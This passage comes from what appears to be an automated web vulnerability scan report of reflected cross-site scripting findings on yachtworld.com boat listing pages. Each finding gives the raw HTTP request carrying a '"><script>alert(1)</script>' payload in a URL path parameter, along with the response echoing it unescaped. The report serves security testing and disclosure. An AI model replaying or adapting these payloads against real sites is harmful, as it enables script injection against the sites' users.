Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:26 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 01:47:39 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:25 GMT
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1787065&a7e94"><script>alert(1)</script>6a57b0b4811=1&boat_id=1787065&back=/core/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States&boat_id=1787065">
...[SNIP]...

3.125. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960f7"><script>alert(1)</script>6d050b13f48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-2270278/Placida960f7"><script>alert(1)</script>6d050b13f48/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:48 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sat, 22 Jan 2011 03:59:44 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:47 GMT
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2270278&boat_id=2270278&back=/core/boats/2005/Regulator-32-Fs-2270278/Placida960f7"><script>alert(1)</script>6d050b13f48/FL/United-States&boat_id=2270278">
...[SNIP]...

3.126. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e586c"><script>alert(1)</script>698b112f45f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-2270278/Placida/FLe586c"><script>alert(1)</script>698b112f45f/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:18 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sat, 22 Jan 2011 03:59:44 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:17 GMT
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F